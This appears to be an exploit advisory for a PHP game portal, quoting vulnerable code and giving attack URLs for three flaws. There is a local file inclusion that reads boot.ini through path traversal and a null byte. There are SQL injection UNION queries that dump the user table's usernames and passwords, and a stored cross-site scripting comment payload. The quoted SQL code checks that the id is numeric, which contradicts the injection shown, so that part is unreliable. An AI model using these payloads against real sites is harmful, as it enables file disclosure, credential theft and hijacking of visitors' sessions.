Local File Inclusion !
Header.php Vuln
-----------------------------
if(!$_GET["lang"])
{
include("lang/".config('lang'));
}
else
{
SetCookie("lang",$_GET["lang"]);
header('Location: ' . $_SERVER['HTTP_REFERER'] );
}
if (!$_COOKIE["lang"])
{
include("lang/".config('lang'));
}
else
{
$lang = $_COOKIE["lang"];
include("lang/" . $lang . ".inc.php");
}
-------------------------------
Exploit :
http://site.com/path/header.php?header.php?lang=[LFI]
Sample ( Tested on a windows box)
http://localhost/phpdirectorgameedition/header.php?lang=../../../../boot.ini%00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SQL Injection
Page : Games.php Vuln Page (line 12 / 121 - 128 )
-----------------------------------------
$idc = $_GET["id"];
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if(isset($idc) && is_numeric($idc)){
$id = mysql_real_escape_string($idc);
$result = mysql_query("SELECT * FROM pp_files WHERE id=$id AND `approved` = '1' LIMIT 1") or die(mysql_error());
}else{
$result = mysql_query("select * from pp_files WHERE approved='1' AND reject='0' order by rand() LIMIT 1") or die(mysql_error());
}
-----------------------------------
Exploit :
http://site/games.php?id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
http://site/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
Example :
DB Version
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
Users
http://localhost/phpdirectorgameedition/games.php?id=-1 UNION SELECT 1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from pp_user--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
XSS ( Cross Site Scripting )
You Can even use a Xss Shell on this Vuln
Goto this page
http://localhost/phpdirectorgameedition/games.php?id=1
In the comment form put "<script>alert("XSS")</script>" then put a sybmit the comment
Vuln Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if(isset($_POST['go']) && !empty($_POST['comment']) && !empty($_POST['nom']))
{
mysql_query("INSERT INTO pp_comment (file_id, nom, comment,ip) VALUES ('$_POST[id]', '$_POST[nom]','".addslashes($_POST['comment'])."','$ip')");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~